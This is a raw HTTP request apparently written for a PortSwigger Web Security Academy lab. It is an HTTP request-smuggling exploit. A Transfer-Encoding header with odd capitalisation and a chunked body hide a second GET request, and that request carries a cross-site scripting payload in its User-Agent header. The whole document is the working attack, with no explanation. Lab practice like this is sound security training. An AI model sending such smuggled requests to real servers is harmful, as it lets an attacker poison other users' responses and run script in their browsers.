POST / HTTP/1.1
Host: 0a8e006d03a3af8bc0d7567e00100006.web-security-academy.net
Cookie: session=WXiTlzYRPcgz9kUvqwEi22f546tdVwyv
User-Agent: asd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
tRANSFER-ENCODING: chunked
Content-Length: 154

0

GET /post?postId=10 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: "><script>alert(1)</script>
Content-Length: 8

foo=

